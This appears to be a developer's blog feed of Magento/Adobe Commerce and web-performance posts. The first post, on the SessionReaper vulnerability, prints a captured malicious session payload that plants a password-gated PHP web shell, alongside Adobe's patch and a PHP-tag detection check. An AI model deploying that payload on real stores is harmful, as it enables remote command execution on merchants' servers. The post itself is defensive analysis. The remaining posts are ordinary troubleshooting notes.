Max Chadwick · My Website · maxpchadwick
Feed generated by Jekyll on 2025-10-29T15:23:06+00:00 · https://maxchadwick.xyz/feed.xml

Shutting Down File Upload Controllers for SessionReaper is futile
2025-10-29 · https://maxchadwick.xyz/blog/shutting-down-file-upload-controllers-for-session-reaper-is-futile

Since Searchlight Cyber published a technical write-up and proof of concept for the SessionReaper vulnerability, attackers have been mass-scanning Magento / Adobe Commerce stores for vulnerable targets. The first phase of the attack involves uploading a payload containing malicious session data to the server.

$ cat pub/media/customer_address/s/e/sess_aly4jr1awshxasfgwwboqeiqn3
_|O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{S:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{S:4:"data";a:3:{S:7:"Expires";i:1;S:7:"Discard";b:0;S:5:"Value";S:161:"<?php if (!hash_equals('4009d3fa8132195a2dab4dfa3affc8d2', md5(md5($_REQUEST['pass'] ?? '')))) { header('Location:404.php'); exit; } system($_REQUEST['cmd']); ?>";}}}S:10:"strictMode";N;S:8:"filename";S:16:"./errors/503.php";S:19:"storeSessionCookies";b:1;}

Next, the attacker sends a request to the /rest/default/V1/guest-carts/:cartId/order endpoint, manipulating the savePath property of the sessionConfig object such that the malicious session will be initialized.

To protect against this vulnerability it is critical to apply Adobe’s patch, which adds validation to the API request handling to control which types of objects can be created, preventing manipulation of the sessionConfig.

diff --git a/vendor/magento/framework/Webapi/ServiceInputProcessor.php b/vendor/magento/framework/Webapi/ServiceInputProcessor.php
index ba58dc2bc7acf..06919af36d2eb 100644
--- a/vendor/magento/framework/Webapi/ServiceInputProcessor.php
+++ b/vendor/magento/framework/Webapi/ServiceInputProcessor.php
@@ -246,6 +246,13 @@ private function getConstructorData(string $className, array $data): array
             if (isset($data[$parameter->getName()])) {
                 $parameterType = $this->typeProcessor->getParamType($parameter);

+                // Allow only simple types or Api Data Objects
+                if (!($this->typeProcessor->isTypeSimple($parameterType)
+                    || preg_match('~\\\\?\w+\\\\\w+\\\\Api\\\\Data\\\\~', $parameterType) === 1
+                )) {
+                    continue;
+                }
+
                 try {
                     $res[$parameter->getName()] = $this->convertValue($data[$parameter->getName()], $parameterType);
                 } catch (\ReflectionException $e) {

However, implementing this patch alone does not stop an attacker from performing phase 1 of the attack and uploading the malicious session files.

I have noticed a lot of discussion about this, with some recommending patching the Magento\Customer\Controller\Address\File\Upload class to immediately bail and not run at all.

While I can understand this inclination, it is ultimately the wrong solution to the problem. It is expected that frontend users are able to upload files to the server for some use cases (as is common functionality in many web applications). In the core Adobe Commerce codebase (not Magento Open Source) there are 3 other frontend controllers that accept file uploads. It is also very common functionality in 3rd party extensions such as swissuplabs Order Attachments.

Ultimately, applying the Adobe patch to prevent abuse is the best solution to the issue. Beyond that, additional validation of the contents of a proposed file upload (for example, searching for signatures indicative of malware, such as an opening PHP tag) could help prevent these types of uploads from making it to your server.
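As a rough illustration, a signature check like this could run before a file upload is saved. The function name and integration point below are hypothetical, not Magento APIs:

```php
<?php

// Hypothetical helper (illustrative only, not a Magento API): flag
// upload contents containing signatures such as a PHP open tag.
function looksLikePhpPayload(string $contents): bool
{
    // Case-insensitive search for common PHP open tags anywhere in the file
    return stripos($contents, '<?php') !== false
        || stripos($contents, '<?=') !== false;
}

var_dump(looksLikePhpPayload('GIF89a ... ordinary image bytes ...')); // bool(false)
var_dump(looksLikePhpPayload('_|O:31:"GuzzleHttp\Cookie\FileCookieJar" ... <?php system($_REQUEST[\'cmd\']); ?>')); // bool(true)
```

Note that checks like this are easy to bypass, so they are defense in depth on top of the patch, not a replacement for it.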

Chrome Developer Tools Network Tab Filter by ‘not’ status code
2025-01-10 · https://maxchadwick.xyz/blog/chrome-developer-tools-status-code-is-not

Recently a co-worker reported sporadic 500-range errors on a website he was testing. I was trying to gather some information on what was happening and wanted the “Network” tab in Chrome DevTools to show me only the following requests

  1. Only requests to the domain of the specific website (e.g. filter out all 3rd party requests)
  2. All non 200 responses

Step one I knew how to do: in the filter box, enter domain:example.com (replacing example.com with the actual domain for the project). However, I was unsure how to accomplish the second step.

Through some Googling I eventually discovered that it is possible to do a negative search by prepending the - symbol to the field on which you are filtering.

Putting this all together, I landed on the following filter search

domain:example.com -status-code:200

Here’s a screenshot of how this looks in DevTools when visiting amazon.com.

Screenshot of filtering in DevTools network panel

Hope you find this helpful.

Mixin is not a function in Magento / Adobe Commerce
2024-12-17 · https://maxchadwick.xyz/blog/adobe-commerce-mixin-is-not-a-function

A few weeks back I found myself staring at the following error on a Magento project.

TypeError: originalPlaceOrderFunction(paymentData,messageContainer).done is not a function. (In 'originalPlaceOrderFunction(paymentData,messageContainer).done(function(response){if(paymentData.method==='subscribe_pro'){$(document).trigger('subscribepro:orderPlaceAfter',[response]);}})', 'originalPlaceOrderFunction(paymentData,messageContainer).done' is undefined);

The error was firing in some cases when the user attempted to click the place order button. Googling wasn’t much help, nor was the error message especially clear about the exact cause. As such, I figured I’d do a quick write-up to help any future developers who might find themselves in the same shoes.

The Backtrace

The backtrace from the error pointed toward the place-order-mixin.js file which was included as part of the Subscribe Pro extension:

Ref: https://github.com/subscribepro/subscribepro-magento2-ext/blob/8ea9593e3f734f42f3ae462c70cda5d14f5f470a/view/frontend/web/js/action/checkout/place-order-mixin.js#L10

Given that the error was pointing toward a file within the Subscribe Pro module, my first inclination was that this was a bug within their module, however that turned out to not be the case.

Applying Some Critical Thinking

Thinking more about the error I realized that if .done was “not a function”, that would indicate that originalPlaceOrderFunction was not a deferred object. Knowing that multiple mixins can be declared on a single JavaScript component / function I became suspicious that perhaps the problem wasn’t with Subscribe Pro itself, but rather another mixin returning an unexpected type such as Boolean prior to the Subscribe Pro code running.

Locating The Problematic Mixin

Searching the code I found another mixin also hooked into Magento_Checkout/js/action/place-order that was intended to validate that the quote’s shipping address contained a phone number.

define([
    'mage/utils/wrapper',
    'Magento_Checkout/js/model/quote',
    'mage/translate',
    'Magento_Ui/js/model/messageList'
], function (wrapper, quote, $t, messageList) {
    'use strict';

    return function (placeOrderFunction) {
        return wrapper.wrap(placeOrderFunction, function (originalPlaceOrder, paymentData, messageContainer) {
            var shippingAddress = quote.shippingAddress();
            if (!shippingAddress['telephone']) {
                messageList.addErrorMessage({ message: $t('Phone Number is missing on the Shipping Address.') });
                return false;
            }
            return originalPlaceOrder(paymentData, messageContainer);
        });
    };
});

A-ha! So this mixin was returning false if the quote’s shipping address was missing a phone number. The Subscribe Pro code was subsequently trying to hook into the same function, but failing, as it was receiving a Boolean rather than the expected deferred object.

Fixing the issue would ultimately require refactoring this code to handle phone number validation in a different way, rather than short-circuiting the place-order action.

Lesson learned: If you’re authoring a mixin, make sure you are returning the expected type for compatibility with other mixins.
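To make the failure mode concrete, here is a minimal sketch. The wrapper and names are simplified stand-ins (a native Promise is used in place of jQuery’s Deferred, and wrap approximates what mage/utils/wrapper does), not the real Magento implementation:

```javascript
// Simplified stand-in for Magento's mage/utils/wrapper: the interceptor
// receives the original function as its first argument.
function wrap(original, interceptor) {
    return function (...args) {
        return interceptor(original, ...args);
    };
}

// The real place-order action returns a jQuery Deferred; a native
// Promise stands in here with the same .then() contract.
function placeOrder(paymentData) {
    return Promise.resolve({ orderId: 1 });
}

// Broken mixin: short-circuits with a Boolean, so the next mixin's
// call to .done()/.then() blows up ("is not a function").
const brokenPlaceOrder = wrap(placeOrder, function (original, paymentData) {
    if (!paymentData.telephone) {
        return false;
    }
    return original(paymentData);
});

// Safe mixin: always returns the same type the original returns.
const safePlaceOrder = wrap(placeOrder, function (original, paymentData) {
    if (!paymentData.telephone) {
        return Promise.reject(new Error('Phone Number is missing on the Shipping Address.'));
    }
    return original(paymentData);
});

console.log(typeof brokenPlaceOrder({}).then); // "undefined" -- the next mixin breaks

const rejected = safePlaceOrder({});
rejected.catch(function () {}); // swallow the rejection for this demo
console.log(typeof rejected.then); // "function" -- chaining still works
```

The safe version still blocks order placement when validation fails, but does so by rejecting, which downstream mixins can chain on.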

Segfaults when using ionCube or SourceGuardian with the New Relic PHP Agent
2024-12-06 · https://maxchadwick.xyz/blog/segfaults-when-using-ioncube-or-sourceguardian-with-new-relic-php-agent

Over the past few months I’ve seen reports from multiple clients about problems saving and updating product information on their Adobe Commerce stores. We originally saw the issue back in August, and I need to give credit to Nemanja Djuric from Webscale, as he was actually the one who identified the root cause.

There is a known issue when using versions > 10.17.0.7 of the New Relic PHP Agent with ionCube or SourceGuardian installed (which was the case on all the projects where we saw this issue). The problem is apparently connected to a known issue in PHP core with the observer API.

When this has come up, downgrading the New Relic PHP agent to 10.17.0.7 as recommended here has solved the problem. However, it also appears that there is a fix in PHP core, and upgrading to PHP >= 8.2.23 / 8.3.11 may also be a viable option.

Why 404s Aren’t Cached in Adobe Commerce
2024-11-22 · https://maxchadwick.xyz/blog/why-404s-arent-cached-in-adobe-commerce

Recently I was investigating an outage on a client website where a large spike in traffic generating 404 responses was at play.

Screenshot of traffic spike

Reviewing the requests in detail, I noticed that the same URLs were being hit repeatedly within a short time frame, however the responses never came from cache.

This led me to the question…why wouldn’t a 404 response be served from cache? I reached out to Adobe support and learned a few things. In this post I will share my findings.

Keeping the response “fresh”

The initial explanation I got from Adobe was essentially that the page contents could change (e.g. an item comes back in stock), so it’s best not to cache the 404 page to make sure each user sees a fresh response each time.

That made sense to me to some degree. On the flip side, however, during the outage the same page was being loaded repeatedly in a very short period of time, causing the site to become unstable. I thought a happy medium might be to cache the page, but only for a short amount of time (e.g. 5 minutes).

The security concern

As I began to figure out how to implement caching of the 404 page I stumbled upon the commit which originally prevented 404 caching. The commit added the following directive to Magento\Cms\Controller\Noroute\Index::execute.

$resultPage->setHeader('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0', true);

Looking closely at the commit, I noticed the author name was “pawan-adobe-security”.

Screenshot of commit

Commit: https://github.com/magento/magento2/commit/b91e690faf2056861276db10d99acfe83a1bdc06

The fact that “security” was in the username set off some alarm bells to me. I followed up with Adobe for more details and they shared the following scenario.

  1. User A leaves a review for Product X. User A will have access to view the review via their account at e.g. example.com/review/customer/view/id/XXX
  2. User B sends a request to example.com/review/customer/view/id/XXX prior to User A having visited it. The response is a 404 which is now cached
  3. User A now tries to view the review from their account, however they can’t, as the 404 response has been cached

I realized this is technically a type of denial of service, and it could be extended to other endpoints, such as viewing an order from the customer’s account.

While the likelihood of abuse seems low, no-cache-ing the 404 seems to be a necessary evil to prevent this potential abuse scenario.

Viewing Origin Response on Adobe Commerce Cloud
2024-11-14 · https://maxchadwick.xyz/blog/viewing-origin-response-on-adobe-commerce-cloud

Recently I was working through an issue on an Adobe Commerce Cloud project where I was interested to see the raw response headers issued by the Magento backend. With Adobe Commerce Cloud, requests are typically routed through Fastly, which removes and modifies the origin response headers. My searching and testing wasn’t turning up a solution for my needs. Adobe provides documentation on how to “bypass” Fastly. While this is useful in some cases, such as preventing specific pages from being cached, it still doesn’t allow visibility into the raw response.

I opened a support ticket with Adobe and they provided the below answer. Since I couldn’t find it documented anywhere publicly, I figured I’d share it here.

The Solution

This is possible by SSH-ing to the backend server and issuing the following curl command directly to localhost:8080 (replace www.example.com with the domain of the website you are trying to access).

$ curl -D - -o /dev/null -s http://localhost:8080/ -H "X-Forwarded-Proto: https" -H "Host: www.example.com"

I had tried something similar (using curl --resolve) prior to contacting Adobe, but hadn’t been able to get it to work.

The example above would load the home page of example.com. The localhost URL path can also be changed to load a specific page. For example, in my case I was interested to see the response headers of the 404 page, which I achieved as follows.

$ curl -D - -o /dev/null -s http://localhost:8080/404 -H "X-Forwarded-Proto: https" -H "Host: www.example.com"
FACET-ing New Relic PageViewTiming Data By ‘Page Type’
2024-11-07 · https://maxchadwick.xyz/blog/newrelic-custom-attribute-page-type

New Relic’s PageViewTiming data set provides excellent visibility into important performance metrics such as Core Web Vitals. When analyzing this data it can be useful to segment it by “page type” — for example, on an ecommerce website it can be helpful to know LCP or CLS scores for the product detail page, or product listing page individually. While it’s possible to view performance metrics for specific page URLs via the default pageUrl field, a website can have thousands (or more) of unique URLs for a given page type. Unless a predictable and consistent pattern is used for all URLs of a specific page type, by default it is not possible to segment data this way.

New Relic “Custom Attributes”

This issue can be solved by using New Relic custom attributes, which will be available when querying the PageViewTiming data set. The browser agent provides a setCustomAttribute function, which can be used for this purpose.

For example, in the case of Magento / Adobe Commerce, the “page type” can be identified by consulting the classList of the <body> element. The below snippet can be used to quickly and easily set the pageType attribute for the product and category pages.

<script>
    (function() {
        if (!window.newrelic) {
            return;
        }

        if (document.body.classList.contains('catalog-category-view')) {
            newrelic.setCustomAttribute('pageType', 'catalog/category/view');
            return;
        }

        if (document.body.classList.contains('catalog-product-view')) {
            newrelic.setCustomAttribute('pageType', 'catalog/product/view');
            return;
        }
    })();
</script>

Once in place, pageType can be used in FACET and WHERE clauses in your NRQL queries.
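For example, an illustrative NRQL query (the percentile threshold and time window here are arbitrary choices):

SELECT percentile(largestContentfulPaint, 75)
FROM PageViewTiming
WHERE pageType IS NOT NULL
FACET pageType
SINCE 1 week AGO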

Add an IP Address to a Fastly ACL via the CLI with Magento
2023-07-20 · https://maxchadwick.xyz/blog/add-an-ip-to-fastly-acl-via-cli-magento

Recently I was in a bit of a pickle on a new Magento project that my company was taking over.

Access to the staging site was restricted via Fastly. I had SSH access to the environment, but my IP address was not allowed via the ACL, so I couldn’t connect to the website’s backend UI to grant myself access.

I wound up figuring out how to manage this via the CLI. Since I struggled a bit with figuring it out, I figured I’d share my findings here.

The Endpoint to Call

IP addresses can be added to an ACL via the “Create an ACL entry” resource.

The request looks like this

POST /service/[service_id]/acl/[acl_id]/entry

The IP address is then passed in the request body, along with other parameters such as a comment.
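Putting those together, an entry-creation request might look something like this (the IP address and comment values here are purely illustrative):

POST /service/SERVICE_ID/acl/ACL_ID/entry HTTP/1.1
Host: api.fastly.com
Fastly-Key: FASTLY_KEY
Content-Type: application/json

{"ip": "203.0.113.10", "comment": "Max - office IP"}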

Figuring Out The Service ID

Assuming you are using Magento Cloud, the Service ID (and Fastly Key) can be found in the /mnt/shared/fastly_tokens.txt file. “API Token” is the FASTLY_KEY and “Service ID” is the SERVICE_ID.

Finding the ACL ID

First, get the active version. You can do this as follows, assuming you have jq installed.

# Get the active version. In this example 105 is active
$ curl --silent -H "Fastly-Key: FASTLY_KEY" https://api.fastly.com/service/SERVICE_ID/version \
  | jq '.[] | if .active then .number else empty end'
105

Next review the list of ACLs for that version

$ curl --silent -H "Fastly-Key: FASTLY_KEY" https://api.fastly.com/service/SERVICE_ID/version/VERSION/acl | jq

Here you will find the id of the ACL you want to append to

Adding the IP

You can certainly issue a curl request, but another option is to do this with n98-magerun2 dev:console, which is how I did it. The commands I ran looked like this…

$ XDG_CONFIG_HOME=~/var/ var/n98-magerun2.phar dev:console
>>> $api = $di->get('Fastly\Cdn\Model\Api')
>>> $api->upsertAclItem(ACL_ID, IP_TO_INSERT, null, COMMENT)
What CURLOPT_FAILONERROR does in PHP
2023-04-12 · https://maxchadwick.xyz/blog/curlopt-failonerror-php-behavior

Testing for this blog post was done with PHP version 8.2.1

During a recent code review I learned about CURLOPT_FAILONERROR for the first time.

I read through both the libcurl documentation as well as the PHP documentation and in the end was still unclear exactly what this option does.

In this post I’ll share my findings from some experimentation.

What the libcurl documentation says

The libcurl documentation describes the behavior as follows:

Request failure on HTTP response >= 400

A long parameter set to 1 tells the library to fail the request if the HTTP code returned is equal to or larger than 400. The default action would be to return the page normally, ignoring that code.

When this option is used and an error is detected, it will cause the connection to get closed and CURLE_HTTP_RETURNED_ERROR is returned.

Source: https://curl.se/libcurl/c/CURLOPT_FAILONERROR.html

What the PHP documentation says

true to fail verbosely if the HTTP code returned is greater than or equal to 400. The default behavior is to return the page normally, ignoring the code.

Source: https://www.php.net/manual/en/function.curl-setopt.php

My Questions

Reading through these pieces of documentation I was left with a few questions

  • What is the definition of “fail the request” (from the libcurl documentation) or “fail” (from the PHP documentation)?
  • What will curl_exec return if the request “fails”? The libcurl documentation seems to suggest the return value will be CURLE_HTTP_RETURNED_ERROR.

First order of business: What is CURLE_HTTP_RETURNED_ERROR?

The first thing I was interested in was what the CURLE_HTTP_RETURNED_ERROR const evaluated to in PHP. Using php -r here’s what I found:

$ php -r 'var_dump(CURLE_HTTP_RETURNED_ERROR) . PHP_EOL;'
int(22)
$ php -r 'var_dump((bool)CURLE_HTTP_RETURNED_ERROR) . PHP_EOL;'
bool(true)

Given these findings it seemed unlikely to me that PHP would actually return CURLE_HTTP_RETURNED_ERROR if the request “failed” (would it really return a truthy value?), despite what the libcurl documentation had to say.

Running some tests

First, I created a simple script that would return an HTTP 503 response code and a response body with the string “Error”.

<?php

http_response_code(503);

echo 'Error' . PHP_EOL;

Next I used php -S to run a server on port 1234 that would execute that script.

$ php -S localhost:1234
[Wed Apr 12 21:30:36 2023] PHP 8.2.1 Development Server (http://localhost:1234) started

Then, I created a script that would send a request to my server, to test the behavior of CURLOPT_FAILONERROR.

<?php

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://localhost:1234');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FAILONERROR, true);

$response = curl_exec($ch);

var_dump($response) . PHP_EOL;
var_dump(curl_error($ch) . PHP_EOL);

Finally, I got the response.

$ php test.php
bool(false)
string(38) "The requested URL returned error: 503
"

What I learned

Based on this test, here’s what I learned about what CURLOPT_FAILONERROR does in PHP

  • If the URL returns an HTTP status code >= 400, curl_exec will return false
    • CURLOPT_RETURNTRANSFER cannot be used to access the response body when this option is used
  • curl_error will return a message indicating the HTTP status code that was received.

My conclusion

Ultimately, CURLOPT_FAILONERROR doesn’t seem like a great option since it discards the response body, which might contain useful information in the case of a failure. Checking CURLINFO_HTTP_CODE via curl_getinfo seems like a better way to handle unexpected HTTP response codes.
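Here is a sketch of that alternative. handleResponse() is a hypothetical helper used for illustration; in real usage $body would come from curl_exec() with CURLOPT_RETURNTRANSFER enabled, and $httpCode from curl_getinfo($ch, CURLINFO_HTTP_CODE):

```php
<?php

// Hypothetical helper illustrating the curl_getinfo() approach: leave
// CURLOPT_FAILONERROR off so the body is preserved, then branch on the
// HTTP status code ourselves.
function handleResponse(string|false $body, int $httpCode): array
{
    if ($body === false) {
        // Transport-level failure (DNS, connect timeout, etc.)
        return ['ok' => false, 'error' => 'transport failure', 'body' => null];
    }
    if ($httpCode >= 400) {
        // Unlike with CURLOPT_FAILONERROR, the response body is still available
        return ['ok' => false, 'error' => "HTTP $httpCode", 'body' => $body];
    }
    return ['ok' => true, 'error' => null, 'body' => $body];
}

// With the 503 test server from earlier, the inputs would be "Error\n" and 503
var_dump(handleResponse("Error\n", 503));
```

This way the error body (often a useful diagnostic) is retained alongside the failure status.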

Experimenting with Partytown
2022-12-22 · https://maxchadwick.xyz/blog/experimenting-with-partytown

A couple of weeks back, in a Twitter conversation, I learned about Partytown.

I was immediately intrigued by the idea and saw great potential, especially for the ecommerce projects that I work on daily.

Today I spent some time playing with Partytown. In this post I’ll share my process and findings.

Methodology

For my use-case I was looking to quickly test some potential performance optimizations against a remote website that I didn’t have a copy of running locally. The website was running Adobe Commerce (a.k.a. Magento) on the Adobe Commerce Cloud infrastructure.

Running this type of testing is a task that comes up somewhat frequently for me and my current favorite way to do this is using Chrome developer tools local overrides.

Partytown publishes some documentation on how to integrate into plain old HTML although I did find it a bit confusing. Here’s what I wound up doing.

Get a copy of the Partytown code

First we get a copy of the Partytown code

# Make a random temporary folder
mkdir test && cd test

# Install Partytown
npm install @builder.io/partytown

# Use partytown copylib to obtain the code for web publishing
# Partytown wants to use ~partytown as the directory name
# but the ~ in the folder name needs to be escaped and is annoying
node node_modules/@builder.io/partytown/bin/partytown.cjs copylib partytown

Now your partytown directory should look something like this…

partytown
├── debug
│   ├── partytown-atomics.js
│   ├── partytown-media.js
│   ├── partytown-sandbox-sw.js
│   ├── partytown-sw.js
│   ├── partytown-ww-atomics.js
│   ├── partytown-ww-sw.js
│   └── partytown.js
├── partytown-atomics.js
├── partytown-media.js
├── partytown-sw.js
└── partytown.js

Upload the code to the remote server

Per the Partytown documentation, the code needs to be hosted from the origin domain. I attempted to simply drop my partytown directory into my local overrides folder for the website, however Chrome complained that the service worker file wasn’t being served with the correct MIME type. To get around this I just uploaded the files to the remote server (maybe there’s a better way to do this?).

On Adobe Commerce Cloud we can drop them into the pub/media folder.

# Zip up the code
zip -r partytown.zip partytown

# scp it up
scp partytown.zip user@host:~/pub/media

# SSH in and unzip it
ssh user@host
cd pub/media
unzip partytown

Add The Partytown Snippet to the head

Using local overrides inline the snippet into the <head> of the document. This will look something like this.

Note that we have to manually replace /~partytown with /media/partytown.

<script>
/* Partytown 0.7.3 - MIT builder.io */
!function(t,e,n,i,r,o,a,d,s,c,p,l){function u(){l||(l=1,"/"==(a=(o.lib||"/media/partytown/")+(o.debug?"debug/":""))[0]&&(s=e.querySelectorAll('script[type="text/partytown"]'),i!=t?i.dispatchEvent(new CustomEvent("pt1",{detail:t})):(d=setTimeout(w,1e4),e.addEventListener("pt0",f),r?h(1):n.serviceWorker?n.serviceWorker.register(a+(o.swPath||"partytown-sw.js"),{scope:a}).then((function(t){t.active?h():t.installing&&t.installing.addEventListener("statechange",(function(t){"activated"==t.target.state&&h()}))}),console.error):w())))}function h(t){c=e.createElement(t?"script":"iframe"),t||(c.setAttribute("style","display:block;width:0;height:0;border:0;visibility:hidden"),c.setAttribute("aria-hidden",!0)),c.src=a+"partytown-"+(t?"atomics.js?v=0.7.3":"sandbox-sw.html?"+Date.now()),e.body.appendChild(c)}function w(t,n){for(f(),t=0;t<s.length;t++)(n=e.createElement("script")).innerHTML=s[t].innerHTML,e.head.appendChild(n);c&&c.parentNode.removeChild(c)}function f(){clearTimeout(d)}o=t.partytown||{},i==t&&(o.forward||[]).map((function(e){p=t,e.split(".").map((function(e,n,i){p=p[i[n]]=n+1<i.length?"push"==i[n+1]?[]:p[i[n]]||{}:function(){(t._ptf=t._ptf||[]).push(i,arguments)}}))})),"complete"==e.readyState?u():(t.addEventListener("DOMContentLoaded",u),t.addEventListener("load",u))}(window,document,navigator,top,window.crossOriginIsolated);
</script>

Test your optimizations

Before making any changes, use Chrome developer tools to run a Lighthouse scan.

Next, identify some potentially problematic third-party scripts. Add the type="text/partytown" attribute to those scripts in your local override. Then re-run Lighthouse to observe the impact.
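The change to each tag is just the type attribute (the script URL here is illustrative):

<!-- Before: executes on the main thread -->
<script src="https://cdn.example.com/third-party-widget.js"></script>

<!-- After: Partytown intercepts this and runs it in a web worker -->
<script type="text/partytown" src="https://cdn.example.com/third-party-widget.js"></script>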

My findings

I tested this on a client staging site today and had very positive results:

Initial Metrics

  • TBT - 2,250ms
  • Third party blocking time - 970ms

Accessibe snippet moved to Partytown

  • TBT - 1,950ms
  • Third party blocking time - 640ms

Accessibe + Grin snippets moved to Partytown

  • TBT - 1,420ms
  • Third party blocking time - 680ms (I don’t think Lighthouse knows that Grin is 3rd party)

Accessibe + Grin + PowerReviews moved to Partytown

  • TBT - 620ms
  • Third party blocking time - 270ms

Conclusion

I’ve just scratched the surface so far with Partytown, but am very excited about the positive performance improvements it can offer for many websites (especially ecommerce). Hope you found this article helpful!
